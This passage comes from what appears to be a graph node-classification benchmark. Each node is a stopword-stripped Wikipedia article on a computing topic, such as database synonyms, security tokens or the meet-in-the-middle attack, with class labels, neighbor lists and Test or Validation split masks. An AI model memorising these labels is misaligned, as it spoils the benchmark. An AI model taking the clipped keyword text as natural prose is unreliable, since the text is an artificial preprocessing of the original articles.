    "text": "Content_addressable_network:content addressable network content addressable network distributed decentralized p2p infrastructure provides hash table functionality internet-like scale one original four distributed hash table proposals introduced concurrently chord pastry tapestry like distributed hash tables designed scalable fault tolerant self-organizing architectural design virtual multi-dimensional cartesian coordinate space type overlay network multi-torus n-dimensional coordinate space virtual logical address completely independent physical location physical connectivity nodes points within space identified coordinates entire coordinate space dynamically partitioned among nodes system every node possesses least one distinct zone within overall space node maintains routing table holds ip address virtual coordinate zone neighbors node routes message towards destination point coordinate space node first determines neighboring zone closest destination point looks zone node ip address via routing table join joining node must find node already overlay network bootstrapping nodes may used inform joining node ip addresses nodes currently overlay network joining node receives ip address node already attempt identify zone joining node randomly picks point coordinate space sends join request directed random point one received ip addresses nodes already overlay network route join request correct device via zone-to-ip routing tables node managing destination point zone receives join request may honor join request splitting zone half allocating first half allocating joining node second half honor join request joining node keeps picking random points coordinate space sending join requests directed random points successfully joins network zone split allocation complete neighboring nodes updated coordinates two new zones corresponding ip addresses routing tables updated updates propagated across network handle node departing must detecting node departure done instance via heartbeat messages periodically broadcast routing table information neighbors predetermined period silence neighbor neighboring node determined failed considered departing node alternatively node willingly departing may broadcast notice neighbors departing node identified zone must either merged taken first departed node zone analyzed determine whether neighboring node zone merge departed node zone form valid zone example zone 2d coordinate space must either square rectangle l-shaped validation test may cycle neighboring zones determine successful merge occur one potential merges deemed valid merge zones merged none potential merges deemed valid neighboring node smallest zone takes control departing node zone take-over take-over node may periodically attempt merge additionally controlled zones respective neighboring zones merge successful routing tables neighboring zones nodes updated reflect merge network see subsection overlay network one single zone merge treat routing processing mindset effectuate take-over take-over node updates neighboring zones nodes routing tables requests either zone resolve take-over node network still sees subsection overlay network two separate zones treats routing processing mindset sylvia ratnasamy paul francis mark handley richard karp scott shenker",
    "neighbors": [
      8640,
      7802,
      5933,
      5438
    ],
    "mask": "Test"
  },
  {
    "node_id": 10793,
    "label": 1,
    "text": "Synonym_(database):synonym database synonym alias alternate name table view sequence schema object used mainly make easy users access database objects owned users hide underlying object identity make harder malicious program user target underlying object synonym alternate name object requires storage definition application uses synonym dbms forwards request synonym underlying base object coding programs use synonyms instead database object names insulate changes name ownership object locations frequently refer database object long name might appreciate able refer shorter name without rename alter code referring synonyms powerful point view allowing users access objects lie within schema synonyms created explicitly create synonym command underlying objects located database databases connected two major uses synonyms create table procedure created schema users access using schema name prefix object name way around schema owner creates synonym name table name public synonyms owned special schema oracle database called public mentioned earlier public synonyms referenced users database public synonyms usually created application owner tables objects procedures packages users application see objects following code shows create public synonym employee table user see table typing original table name wish could provide different table name table create synonym statement remember dba must create public synonyms see table public private synonym ’ mean also perform select insert update delete operations table able perform operations user needs specific privileges underlying object either directly roles application owner private synonym synonym within database schema developer typically uses mask true name table view stored procedure database object application schema private synonyms unlike public synonyms referenced schema owns table object may want create private synonyms want refer table different contexts private synonym overrides public synonym definitions create private synonyms way create public synonyms omit public keyword create statement following example shows create private synonym called addresses locations table note create private synonym refer synonym exactly would original table name synonyms private public dropped manner using drop synonym command one important difference dropping public synonym need add keyword public keyword drop all_synonyms dba_synonyms view provides information synonyms database",
    "neighbors": [
      10632,
      8201,
      8979,
      2068,
      10389,
      7446,
      2456,
      1049,
      5658,
      5403,
      9631,
      9634,
      4263,
      2344,
      7080,
      10286,
      9397,
      3004,
      10048,
      5953,
      9286,
      2901,
      10326,
      987,
      2780,
      4065,
      9828,
      10340,
      10471,
      6124,
      2669,
      6383,
      2544,
      10737,
      9075,
      1146
    ],
    "mask": "None"
  },
  {
    "node_id": 10794,
    "label": 0,
    "text": "Noisy_text_analytics:noisy text analytics noisy text analytics process information extraction whose goal automatically extract structured semistructured information noisy unstructured text data text analytics growing mature field great value huge amounts data produced processing noisy text gaining importance lot common applications produce noisy text data noisy unstructured text data found informal settings online chat text messages e-mails message boards newsgroups blogs wikis web pages also text produced processing spontaneous speech using automatic speech recognition printed handwritten text using optical character recognition contains processing noise text produced circumstances typically highly noisy containing spelling errors abbreviations non-standard words false starts repetitions missing punctuations missing letter case information pause filling words “ um ” “ uh ” texting speech disfluencies text seen large amounts contact centers chat rooms optical character recognition ocr text documents short message service sms text etc documents historical language also considered noisy respect today knowledge language text contains important historical religious ancient medical knowledge useful nature noisy text produced contexts warrants moving beyond traditional text analysis techniques missing punctuation use non-standard words often hinder standard natural language processing tools part-of-speech tagging parsing techniques learn noisy data able process noisy data developed",
    "neighbors": [
      5857,
      1890,
      7780,
      2059,
      5197,
      5399,
      8440,
      10557
    ],
    "mask": "Test"
  },
  {
    "node_id": 10795,
    "label": 3,
    "text": "Semantic_heterogeneity:semantic heterogeneity semantic heterogeneity database schema datasets domain developed independent parties resulting differences meaning interpretation data values beyond structured data problem semantic heterogeneity compounded due flexibility semi-structured data various tagging methods applied documents unstructured data semantic heterogeneity one important sources differences heterogeneous datasets yet multiple data sources interoperate one another essential reconcile semantic differences decomposing various sources semantic heterogeneities provides basis understanding map transform data overcome differences one first known classification schemes applied data semantics william kent two decades ago kent approach dealt structural mapping issues differences meaning pointed data dictionaries potentially solving one comprehensive classifications pluempitiwiriyawej hammer classification scheme semantic schematic heterogeneities xml data sources classify heterogeneities three broad classes moreover mismatches conflicts occur set elements population mismatch attributes description mismatch michael bergman expanded upon schema adding fourth major explicit category language also added examples kind semantic heterogeneity resulting 40 distinct potential categories table shows combined 40 possible sources semantic heterogeneities across sources different approach toward classifying semantics integration approaches taken sheth et al concept split semantics three forms implicit formal powerful implicit semantics either largely present easily extracted formal languages though relatively scarce occur form ontologies description logics powerful soft semantics fuzzy limited rigid set-based assignments sheth et al main point first-order logic fol description logic inadequate alone properly capture needed semantics besides data interoperabiity relevant areas information technology depend reconciling semantic heterogeneities include data mapping semantic integration enterprise information integration among many others conceptual actual data differences perspective vocabularies measures conventions two data sources brought together explicit attention semantic heterogeneities one means get information integrate interoperate mere twenty years ago information technology systems expressed stored data multitude formats systems internet web protocols done much overcome sources differences large number categories semantic heterogeneity categories also patterned anticipated corrected patterned sources inform kind work must done overcome semantic differences still reside",
    "neighbors": [
      49,
      2948,
      7180
    ],
    "mask": "Test"
  },
  {
    "node_id": 10796,
    "label": 3,
    "text": "Branch_(computer_science):branch computer science branch instruction computer program cause computer begin executing different instruction sequence thus deviate default behavior executing instructions order branch branching branched may also refer act switching execution different instruction sequence result executing branch instruction branch instructions used implement control flow program loops conditionals i.e. executing particular sequence instructions certain conditions satisfied branch instruction either unconditional branch always results branching conditional branch may may cause branching depending condition also depending specifies address new instruction sequence target address branch instruction generally classified direct indirect relative meaning instruction contains target address specifies target address found e.g. register memory location specifies difference current target addresses mechanically branch instruction change program counter pc cpu program counter stores memory address next instruction executed therefore branch cause cpu begin fetching instructions different sequence memory cells branch taken cpu program counter set argument jump instruction next instruction becomes instruction address memory therefore flow control changes branch taken cpu program counter unchanged therefore next instruction executed instruction branch instruction therefore flow control unchanged term branch used referring programs high level languages well programs written machine code assembly language high-level programming languages branches usually take form conditional statements various forms encapsulate instruction sequence executed conditions satisfied unconditional branch instructions goto used unconditionally jump begin execution different instruction sequence machine level branch instructions sometimes called jump instructions machine level jump instructions typically unconditional conditional forms latter may taken taken depending condition usually distinct forms one-way jumps often called jump subroutine invocations known call automatically save originating address return address stack allowing single subroutine invoked multiple locations code cpus flag registers earlier instruction sets condition flag register earlier instruction may arithmetic logic instruction often close branch though necessarily instruction immediately branch stored condition used branch jump overflow-flag set temporary information often stored flag register may also located elsewhere flag register design simple slower simple computers fast computers flag register place bottleneck speed instructions could otherwise operate parallel several execution units need set flag bits particular sequence also machines particular instructions condition may checked jump instruction branch label register x negative simple computer designs comparison branches execute arithmetic use power flag register branches fast computer designs comparison branches run faster flag register branches comparison branches access registers parallelism using cpu mechanisms calculation early simple cpu architectures still found microcontrollers may implement conditional jump rather conditional skip next instruction operation conditional jump call thus implemented conditional skip unconditional jump call instruction depending computer architecture assembly language mnemonic jump instruction typically shortened form word jump word branch often along informative letters extra parameter representing condition sometimes details included well range jump offset size special addressing mode used locate actual effective offset table lists machine level branch jump instructions found several well-known architectures achieve high performance modern processors pipelined consist multiple parts partially process instruction feed results next stage pipeline start working next instruction program design expects instructions execute particular unchanging sequence conditional branch instructions make impossible know sequence conditional branches cause stalls pipeline restarted different part program several techniques improve speed reducing stalls conditional branches historically branch prediction took statistics used result optimize code programmer would compile test version program run test data test code counted branches actually taken statistics test code used compiler optimize branches released code optimization would arrange fastest branch direction taken would always frequently taken control flow path permit cpus must designed least predictable branch timing cpus instruction sets power isa designed branch hints compiler tell cpu branch taken problem software branch prediction requires complex software development process run software hardware branch predictors moved statistics electronics branch predictors parts processor guess outcome conditional branch processor logic gambles guess beginning execute expected instruction flow example simple hardware branch prediction scheme assume backward branches i.e smaller program counter taken part loop forward branches larger program counter taken leave loop better branch predictors developed validated statistically running simulation variety test programs good predictors usually count outcomes previous executions branch faster expensive computers run faster investing better branch prediction electronics cpu hardware branch prediction branch hints let compiler presumably superior branch prediction override hardware simplistic branch prediction logic written without branches fewer branches often possible use bitwise operations conditional moves branch predication instead branches another technique branch delay slot approach one instruction branch always executed therefore computer use instruction useful work whether pipeline stalls approach historically popular risc computers family compatible cpus complicates multicycle cpus pipeline faster cpus longer-than-expected pipelines superscalar cpus execute instructions order",
    "neighbors": [
      3457,
      8450,
      7940,
      1798,
      8715,
      8716,
      9739,
      3854,
      6926,
      6032,
      8078,
      1298,
      8590,
      10508,
      7445,
      663,
      27,
      10781,
      10786,
      5412,
      6821,
      8231,
      936,
      9599,
      9003,
      7471,
      2224,
      1841,
      5682,
      1462,
      7607,
      11447,
      7997,
      11003,
      4928,
      7234,
      6084,
      74,
      9932,
      2253,
      8143,
      6739,
      11604,
      10584,
      730,
      604,
      477,
      1502,
      7134,
      7269,
      6502,
      7273,
      10985,
      9964,
      2798,
      4078,
      5358,
      4465,
      5872,
      499,
      372,
      8048,
      8944,
      2039,
      9330,
      249,
      1915,
      8700,
      7421,
      1399
    ],
    "mask": "Test"
  },
  {
    "node_id": 10797,
    "label": 7,
    "text": "HP_Network_Management_Center:hp network management center hp network management center nmc suite integrated hp software solutions used network managers information technology departments solutions allows network operators see catalog monitor routers switches devices network alerts staff network device fails predicts network node connection point may go designed improve operational efficiency hp longer packages network management solutions hp network management center hp offers automation orchestration cloud management software automating lifecycle services.. hp software assets first became part hewlett packard enterprise finally micro focus hp bsa security compliance subscription service attacks vulnerabilities automation providing industry compliance security alerts hp business service automation bsa software alerts come vendor bulletins agencies like national vulnerability database pci security standards council center internet security originally acquired stratavia 2010 hp database middleware automation software automates administrative tasks like provisioning configuration compliance patching release management associated databases application servers version 10 announced may 2013 hp network automation software designed simplify management complex distributed multi-vendor networks large enterprise data centers provides process-powered automation automate complete operational lifecycle network devices provisioning policy-based change management compliance security administration hp network node manager nnmi 10.00 hp nnmi smart plug-in modules use continuous spiral discovery network discovery technology provides up-to-date network topology root cause analysis allows network administrators ascertain level congestion networks identify root cause congestion product helps departments monitor networks isolate issues find outages improve network availability performance solution supports multitenancy architecture including tenant user-level map incident security allows teams manage customers departments sites one console hp network node manager smart plug-in modules ispis extend hp network node manager software ’ nnmi fault availability management hp nnm ispis performance advanced network services hp smart plug-ins integrate fault availability performance advanced network services physical virtualized network infrastructure allow network operators determine display network fault availability performance advanced services status one view progress unified workflow drill context hp automated network management anm software bundles hp network node manager hp network automation several hp smart plug-ins unify network fault availability change configuration compliance performance monitoring automated diagnostics single solution package hp network node manager delivers common console unified fault performance configuration networks second product bundle hp nnm ispis performance metrics traffic quality assurance designed monitor ensure performance network third product bundle hp ispi network engineering toolset net automates common operator tasks provides trap analytics map export capabilities hp network automation handles network change configuration management fourth product bundle hp operations orchestration software creates “ runbooks ” automate provisioning infrastructure deployment faster automated previously version 10 announced may 2013 out-of-the-box support 5,000 operations including amazon s3 storage hp arcsight hp fortify openstack sap applications hp server automation software provides enterprise server lifecycle automation tasks provisioning patching configuration compliance version 10 announced may 2013 allows organizations deploy maintain patching updating thousands servers version also update virtual servers sleeping well active may 2013 hp also released hp server automation software appliance called hp server automation standard includes much core configuration deployment compliance checking functionality found full software edition hp storage essentials single tool provides storage optimization capacity planning june 2013 hp announced version 9.6 expanded support third-party storage arrays including emc vnx block storage brocade access gateway also provided deeper integration hp 3par hp 6000 eva management server development support oracle sap business objects",
    "neighbors": [
      1638,
      5384,
      9353,
      7983,
      8756,
      823,
      1304
    ],
    "mask": "None"
  },
  {
    "node_id": 10798,
    "label": 9,
    "text": "PHP_Standard_Recommendation:php standard recommendation php standard recommendation psr php specification published php framework interop group similar java specification request java serves standardization programming concepts php aim enable interoperability components provide common technical basis implementation proven concepts optimal programming testing practices php-fig formed several php frameworks founders psr suggested members voted according established protocol act consistently line agreed upon processes php-fig official website psr documentation follows nowiki rfc 2119 /nowiki written scott bradner march 1997 harvard university",
    "neighbors": [
      4960,
      8965,
      8644,
      5677
    ],
    "mask": "Test"
  },
  {
    "node_id": 10799,
    "label": 5,
    "text": "Optical_add-drop_multiplexer:optical add-drop multiplexer optical add-drop multiplexer oadm device used wavelength-division multiplexing systems multiplexing routing different channels light single mode fiber smf type optical node generally used formation construction optical telecommunications networks add drop refer capability device add one new wavelength channels existing multi-wavelength wdm signal and/or drop remove one channels passing signals another network path oadm may considered specific type optical cross-connect traditional oadm consists three stages optical demultiplexer optical multiplexer method reconfiguring paths demultiplexer multiplexer set ports adding dropping signals demultiplexer separates wavelengths input fiber onto ports reconfiguration achieved fiber patch panel optical switches direct wavelengths multiplexer drop ports multiplexer multiplexes wavelength channels continue demultiplexer ports add ports onto single output fiber lightpaths directly pass oadm termed cut-through lightpaths added dropped oadm node termed added/dropped lightpaths oadm remotely reconfigurable optical switches example 1×2 middle stage called reconfigurable oadm roadm ones without feature known fixed oadms term oadm applies types often used interchangeably roadm physically several ways make oadm variety demultiplexer multiplexer technologies including thin film filters fiber bragg gratings optical circulators free space grating devices integrated planar arrayed waveguide gratings switching reconfiguration functions range manual fiber patch panel variety switching technologies including microelectromechanical systems mems liquid crystal thermo-optic switches planar waveguide circuits although add/drop functionality oadms distinct add-drop multiplexers former function photonic domain wavelength-division multiplexing latter implicitly considered function traditional sonet/sdh networks",
    "neighbors": [
      5321,
      3754,
      1967,
      2994,
      6267
    ],
    "mask": "Test"
  },
  {
    "node_id": 10800,
    "label": 8,
    "text": "Caudium_(web_server):caudium web server caudium open source web server originally created fork roxen challenger server server written c pike pike also used create extensions server caudium different apache configuration process different directory structure different generally languages used program server extensions dynamic pages different although support php according caudium website caudium offers different performance profile apache n't fork external processes making better suited cope sudden spikes traffic",
    "neighbors": [
      1920,
      4485,
      7430,
      9229,
      7567,
      7695,
      1937,
      7443,
      8350,
      7457,
      3746,
      8994,
      2596,
      3237,
      9125,
      11682,
      7338,
      9387,
      44,
      11439,
      6714,
      10622,
      1991,
      11134,
      595,
      1363,
      4439,
      3545,
      7646,
      225,
      1250,
      865,
      2404,
      4837,
      6379,
      9580,
      2287,
      11376,
      8691,
      10611,
      11386,
      2045,
      3966
    ],
    "mask": "Test"
  },
  {
    "node_id": 10801,
    "label": 4,
    "text": "Security_token:security token security token physical device used gain access electronically restricted resource token used addition place password acts like electronic key access something examples include wireless keycard opening locked door case customer trying access bank account online use bank-provided token prove customer claim tokens may store cryptographic keys may used generate digital signature biometric data fingerprint details may also store passwords designs incorporate tamper resistant packaging others may include small keypads allow entry pin simple button start generating routine display capability show generated key number connected tokens utilize variety interfaces including usb near-field communication nfc radio-frequency identification rfid bluetooth tokens audio capability designed vision-impaired people tokens contain secret information used prove identity four different ways information used time-synchronized one-time passwords change constantly set time interval e.g. per minute sort synchronization must exist client token authentication server disconnected tokens time-synchronization done token distributed client token types synchronization token inserted input device main problem time-synchronized tokens time become unsynchronized however systems rsa securid allow user resynchronize server token sometimes entering several consecutive passcodes also replaceable batteries last 5 years replaced – additional cost another type one-time password uses complex mathematical algorithm hash chain generate series one-time passwords secret shared key password unguessable even previous passwords known open source oauth algorithm standardized algorithms covered us patents password observably unpredictable independent previous ones wherefore adversary would unable guess next password may even knowledge previous passwords tokens contain chips functions varying simple complex including multiple authentication methods simplest security tokens need connection computer tokens physical display authenticating user simply enters displayed number log tokens connect computer using wireless techniques bluetooth tokens transfer key sequence local client nearby access point alternatively another form token widely available many years mobile device communicates using out-of-band channel like voice sms ussd still tokens plug computer may require pin depending type token computer os either read key token perform cryptographic operation ask token firmware perform operation related application hardware dongle required computer programs prove ownership software dongle placed input device software accesses i/o device question authorize use software question commercial solutions provided variety vendors proprietary often patented implementation variously used security features token designs meeting certain security standards certified united states compliant fips 140 federal security standard tokens without kind certification sometimes viewed suspect often meet accepted government industry security standards put rigorous testing likely provide level cryptographic security token solutions designs independently audited third-party agencies disconnected tokens neither physical logical connection client computer typically require special input device instead use built-in screen display generated authentication data user enters manually via keyboard keypad disconnected tokens common type security token used usually combination password two-factor authentication online identification connected tokens tokens must physically connected computer user authenticating tokens category automatically transmit authentication information client computer physical connection made eliminating need user manually enter authentication information however order use connected token appropriate input device must installed common types physical tokens smart cards usb tokens require smart card reader usb port respectively increasingly universal 2nd factor u2f tokens supported open specification group fido alliance become popular consumers mainstream browser support beginning 2015 supported popular websites social media sites older pc card tokens made work primarily laptops type ii pc cards preferred token half thick type iii audio jack port relatively practical method establish connection mobile devices iphone ipad android accessories well known device called square credit card reader iphone android use special purpose interface e.g crypto ignition key deployed united states national security agency tokens also used photo id card cell phones pdas also serve security tokens proper programming many connected tokens use smart card technology smart cards cheap around ten cents contain proven security mechanisms used financial institutions like cash cards however computational performance smart cards often rather limited extreme low power consumption ultra-thin form-factor requirements smart-card-based usb tokens contain smart card chip inside provide functionality usb tokens smart cards enable broad range security solutions provide abilities security traditional smart card without requiring unique input device computer operating system point view token usb-connected smart card reader one non-removable smart card present unlike connected tokens contactless tokens form logical connection client computer require physical connection absence need physical contact makes convenient connected disconnected tokens result contactless tokens popular choice keyless entry systems electronic payment solutions mobil speedpass uses rfid transmit authentication info keychain token however various security concerns raised rfid tokens researchers johns hopkins university rsa laboratories discovered rfid tags could easily cracked cloned another downside contactless tokens relatively short battery lives usually 5–6 years low compared usb tokens may last 10 years tokens however allow batteries changed thus reducing costs bluetooth low energy protocols serve long lasting battery lifecycle wireless transmission however automatic transmission power control antagonizes attempts radial distance estimates escape available apart standardised bluetooth power control algorithm provide calibration minimally required transmission power bluetooth tokens often combined usb token thus working connected disconnected state bluetooth authentication works closer 32 feet 10 meters bluetooth link properly operable token may inserted usb input device function another combination smart card store locally larger amounts identity data process information well another contactless ble token combines secure storage tokenized release fingerprint credentials usb mode operation sign-off requires care token mechanically coupled usb plug advantage bluetooth mode operation option combining sign-off distance metrics respective products preparation following concepts electronic leash near-field communication nfc tokens combined bluetooth token may operate several modes thus working connected disconnected state nfc authentication works closer 1 foot 0.3 meters nfc protocol bridges short distances reader bluetooth connection serves data provision token enable authentication also bluetooth link connected token may serve locally stored authentication information coarse positioning nfc reader relieves exact positioning connector types single sign-on sso solutions like enterprise single sign-on use token store software allows seamless authentication password filling passwords stored token users need remember passwords therefore select secure passwords secure passwords assigned usually tokens store cryptographic hash password token compromised password still protected programmable tokens marketed drop-in replacement mobile applications google authenticator miniotp used mobile app replacement well parallel backup means measures securing data may overcome applies well security tokens major threat incautious operation users shall aware permanent options threat simplest vulnerability password container theft loss device chances happening happening unawares reduced physical security measures locks electronic leash body sensor alarm stolen tokens made useless using two factor authentication commonly order authenticate personal identification number pin must entered along information provided token time output token system allows users authenticate via untrusted network internet vulnerable man-in-the-middle attacks type attack fraudster acts go-between user legitimate system soliciting token output legitimate user supplying authentication system since token value mathematically correct authentication succeeds fraudster granted access citibank made headline news 2006 hardware-token-equipped business users became victims large ukrainian-based man-in-the-middle phishing attack 2012 prosecco research team inria paris-rocquencourt developed efficient method extracting secret key several pkcs 11 cryptographic devices including securid 800 findings documented inria technical report rr-7944 id hal-00691958 published crypto 2012 trusted regular hand-written signature digital signature must made private key known person authorized make signature tokens allow secure on-board generation storage private keys enable secure digital signatures also used user authentication private key also serves proof user ’ identity tokens identify user tokens must kind number unique approaches fully qualify digital signatures according national laws tokens on-board keyboard another user interface used signing scenarios confirming bank transaction based bank account number funds transferred",
    "neighbors": [
      6916,
      10631,
      9745,
      8978,
      278,
      4760,
      5918,
      1054,
      32,
      7327,
      8865,
      11175,
      3880,
      11432,
      939,
      6316,
      1069,
      7983,
      6064,
      3382,
      5433,
      10046,
      3521,
      10566,
      3271,
      7368,
      2889,
      7887,
      10961,
      5077,
      9817,
      7260,
      6750,
      4575,
      7268,
      3941,
      2154,
      11244,
      8174,
      7794,
      5363,
      5108,
      8694
    ],
    "mask": "None"
  },
  {
    "node_id": 10802,
    "label": 2,
    "text": "Nokia_C5-03:nokia c5-03 nokia c5-03 budget resistive touchscreen smartphone wlan cseries released december 2010 phone shazam music identification software social networking software included available download assisted gps ovi maps 3.0 integrated",
    "neighbors": [
      1537,
      8577,
      6276,
      3205,
      11271,
      11655,
      9359,
      1424,
      529,
      2449,
      659,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      11545,
      4003,
      4132,
      6310,
      167,
      40,
      1833,
      3626,
      5290,
      10410,
      9137,
      7220,
      821,
      5175,
      7866,
      1083,
      1216,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9292,
      7246,
      1615,
      4305,
      5201,
      2259,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      109,
      5998,
      1776,
      1533
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10803,
    "label": 2,
    "text": "VP/CSS:vp/css vp/css time-sharing operating system developed national css began life 1968 copy ibm cp/cms time distributed ibm customers charge source code form without support part ibm type-iii library extensive in-house development today would termed software fork national css took vp/css different direction cp/cms although two systems would eventually share many capabilities technical implementations diverged substantive ways vp/css ran ibm ibm plug compatible hardware owned ncss customers site licenses including bank america standard oil california initial period running ibm system/360-67 platform used cp/cms vp/css ported system/370 series made possible ibm added virtual memory capabilities s/370 series 1972 vp/css notable supporting large numbers interactive users per machine compared ibm mainframe operating systems technical operations commercial factors played role making national css commercially viable service business vp/css shared basic architecture concepts cp/cms revolutionary time control program called cp cp/cms vp vp/css created multiple independent virtual machines vms implementing full virtualization underlying hardware – meaning time-sharing user provided private virtual machine appeared entire stand-alone computer capable running software could run bare machine including operating systems concept pioneered ibm research system cp-40 first version cp/cms design departure ibm monolithic operating systems isolating users improved system stability bug one user software could crash another user virtual machine underlying control program approach made cp/cms superior choice commercial time-sharing thus strong foundation national css broke new ground would become important new industry vm created vp ran simple single-user operating system called css derived ibm cambridge monitor system css allowed users run programs manipulate file system manage virtual devices since vp css began life cp cms respectively closely resembled systems particularly early days continuous development introduction new features vp/css ibm vm led significant differences time systems retained obvious family resemblance ibm decision add virtualization virtual memory features s/370 reflects success virtual machine approach time-sharing credit belated decision attributed ibm awareness commercial success national css 1968 founders national css saw cp/cms operating system would good foundation time-sharing business – system technical merits ability share mainframe resources among many interactive users availability source code form cost another firm interactive data corporation reached conclusion firm lured away key cp/cms technical personnel csc mit union carbide national css quickly discovered however cp/cms initial performance adequate sustain profitable operations – literally selling every available minute interactive time would pay 50k/month equipment lease crash technical project began improve performance led number fundamental enhancements soon allowed business make money thus began lengthy reimplementation effort would occupy large development team course fifteen years end lifespan vp/css diverged long way cp/cms roots boasted surprising array features would considered quite modern even today key enhancements original cp/cms system included changes dispatching algorithm paging system virtual memory course new concept time ibm system/360-67 address translation technology enabled various technical approaches ultimately vp/css page migration algorithm three-queue dispatcher became well-known ncss personnel eventually joined ibm thomas j. watson research center work vm technologies another area throughput improvement performance css single-user operating system one important change replacing channel command words ccws expensive simulated instructions something like today termed bios calls simulating complex s/360 i/o architecture virtualization amazing feat – done cp complex innermost core routine called ccwtrans i/o operations trapped within virtual machine however proved enormously cheaper make direct hypervisor calls targeted functions rather simulating operation low-level i/o commands vp/css done using paravirtualization via non-virtualized diag diagnose instruction technique used ibm cp/cms release 3.1 carried forward vm/370 unclear implementation came first – whether invented independently early national css technical efforts quickly established vp/css commercially viable version cp/cms vp/css reputed much better performance ibm reimplementation cp/cms vm/370 – turn reputed substantial performance advantage ibm preferred timesharing solution tso unfortunately documented period performance statistics hard find today however several data points support claims following relative performance believed accurate although documented sources remain located described history cp/cms ibm primary emphasis mvs successors core mainframe operating system led ibm waste substantial technical advantage represented vm/370 made possible independent vendor like ncss strike new territory industry observers pointed hardware vendor natural preference selling hardware increasing number users per machine ncss gained technical advantages ultimately became successful commercially despite fact optimization techniques used enhance vp css performance well understood well-documented literature day ultimately amdahl corporation publicized sales wins several large vp/css data centers ibm began pay public attention ncss technical innovations long thereafter time-sharing industry began feel pressure personal computer revolution need super-optimized multiuser mainframe operating system waned ncss moved away vp/css mid 80s retargeting nomad vm platforms unknown long ncss site-license customers continued use vp/css equipment though seems unlikely could continue long without ongoing ncss operating system support",
    "neighbors": [
      6675,
      7187,
      10776,
      25,
      4637,
      9762,
      5158,
      5678,
      7217,
      7733,
      9784,
      10809,
      573,
      576,
      10333,
      97,
      9829,
      6248,
      8298,
      6772,
      7285,
      9335,
      2168,
      1147,
      2172,
      3197,
      1150,
      2179,
      10883,
      6797,
      9361,
      9366,
      6296,
      9370,
      7325,
      9887,
      3238,
      7848,
      8879,
      3248,
      6837,
      1219,
      8388,
      6342,
      9932,
      5840,
      1235,
      7382,
      8410,
      1253,
      5363,
      2811,
      3323,
      2813,
      9468,
      10499,
      1804,
      273,
      11539,
      789,
      5397,
      284,
      3359,
      10016,
      2345,
      1323,
      7983,
      7477,
      823,
      10040,
      313,
      4409,
      7483,
      11075,
      4423,
      5457,
      11601,
      7507,
      10590,
      863,
      868,
      3429,
      8551,
      5492,
      8063,
      6529,
      4996,
      394,
      3978,
      7053,
      8077,
      7057,
      11667,
      11673,
      8092,
      6557,
      421,
      11184,
      5041,
      5562,
      6075,
      6078,
      9151,
      8136,
      6128,
      5619,
      10235
    ],
    "mask": "Test"
  },
  {
    "node_id": 10804,
    "label": 4,
    "text": "NetIQ:netiq netiq enterprise software company based houston texas whose products provide identity access management security data center management flagship offerings netiq identity manager netiq access manager key software titles include appmanager secure configuration manager sentinel micro focus international owned netiq since 2014 mfi acquired attachmate acquired netiq 2006 six years latter acquired mission critical software .. netiq founded ching-fa hwang her-daw che hon wong ken prayoon cheng tom kemp september 1995 appmanager introduced 1996 february 2000 merger mission critical software widened company focus include systems management well performance 2001 netiq acquired webtrends whose software monitors corporate internet traffic 2006 netiq acquired attachmate attachmate acquired novell 2011 netiq added identity security products well data center virtualization offerings attachmate acquisition led today ’ alignment netiq products three categories 2014 attachmate merged micro focus international",
    "neighbors": [
      3521,
      5860,
      9708,
      3791,
      7983,
      7729,
      3125,
      2901,
      11513,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 10805,
    "label": 2,
    "text": "Cleanup_stack:cleanup stack cleanup stack concept widely used symbian os suitable use places dynamic memory used allocated programming problem dynamic memory sole discretion underlying os whether request memory allocation shall succeed applications requester memory must prepared handle rejection large programs dynamic memory used almost everywhere application frequently adds code handle failure increase code size significantly symbian used mostly phones increase code size amplify memory allocation failures symbian features ingenious solution problem application notes memory allocation may fail places earlier allocated memory address location symbian aware location called cleanup stack event failure symbian knows whatever resource placed cleanup stack needs freed way resources freed program crashes leaves freeing performed automatically symbian os applications die peacefully without worrying would clean mess left cleanup stack make idea keep copy pointer allocated memory elements cleanup stack popped destroyed using push pop popanddestroy example",
    "neighbors": [
      7983
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10806,
    "label": 4,
    "text": "Meet-in-the-middle_attack:meet-in-the-middle attack meet-in-the-middle attack mitm generic space–time tradeoff cryptographic attack encryption schemes rely performing multiple encryption operations sequence mitm attack primary reason double des used triple des key 168-bit bruteforced attacker 2 space 2 operations trying improve security block cipher tempting idea encrypt data several times using multiple keys one might think doubles even n -tuples security multiple-encryption scheme depending number times data encrypted exhaustive search possible combination keys simple brute-force would take 2 attempts data encrypted k -bit keys n times mitm generic attack weakens security benefits using multiple encryptions storing intermediate values encryptions decryptions using improve time required brute force decryption keys makes meet-in-the-middle attack mitm generic space–time tradeoff cryptographic attack mitm attack attempts find keys using range ciphertext domain plaintext composition several functions block ciphers forward mapping first functions backward mapping inverse image last functions quite literally meeting middle composed function example although double des encrypts data two different 56-bit keys double des broken 2 encryption decryption operations multidimensional mitm md-mitm uses combination several simultaneous mitm attacks like described meeting happens multiple positions composed function diffie hellman first proposed meet-in-the-middle attack hypothetical expansion block cipher 1977 attack used space–time tradeoff break double-encryption scheme twice time needed break single-encryption scheme 2011 bo zhu guang gong investigated multidimensional meet-in-the-middle attack presented new attacks block ciphers gost ktantan hummingbird-2 assume someone wants attack encryption scheme following characteristics given plaintext p ciphertext c enc encryption function dec decryption function defined enc inverse mapping k k two keys naive approach brute-forcing encryption scheme decrypt ciphertext every possible k decrypt intermediate outputs every possible k total 2 2 2 operations meet-in-the-middle attack uses efficient approach decrypting c k one obtains following equivalence attacker compute enc p values k dec c possible values k total 2 2 2 k k size operations result enc p operations matches result dec c operations pair k k possibly correct key potentially-correct key called candidate key attacker determine candidate key correct testing second test-set plaintext ciphertext mitm attack one reasons data encryption standard des replaced triple des double des attacker use mitm attack bruteforce double des 2 operations 2 space making small improvement des triple des uses triple length 168-bit key also vulnerable meet-in-the-middle attack 2 space 2 operations considered secure due size keyspace compute following match found keep k k candidate key-pair table test pairs new pair confirm validity key-pair work new pair mitm new pair keysize k attack uses 2encryptions decryptions 2 memory case look-up table built set forward computations contrast naive attack needs 2 encryptions 1 space 1d-mitm efficient sophisticated attack developed multidimensional meet-in-the-middle attack also abbreviated 